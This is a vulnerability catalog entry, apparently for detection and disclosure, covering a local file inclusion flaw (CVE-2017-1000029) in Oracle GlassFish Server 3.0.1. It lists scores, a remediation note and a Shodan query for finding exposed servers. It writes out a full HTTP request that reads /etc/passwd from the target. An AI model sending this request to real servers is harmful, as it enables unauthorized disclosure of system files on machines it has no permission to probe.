| Title | Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. |
| CVSS Score | 7.5 |
| EPSS Score | 0.73502 |
| CVE ID | CVE-2017-1000029 |
| CWE ID | CWE-200 |
| Shodan Query | cpe:"cpe:2.3:a:oracle:glassfish_server" |
| Tags | cve cve2017 glassfish oracle lfi vuln |
Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
GET /resource/file%3a///etc/passwd/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000029.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-1000029.pcap
N/AN/A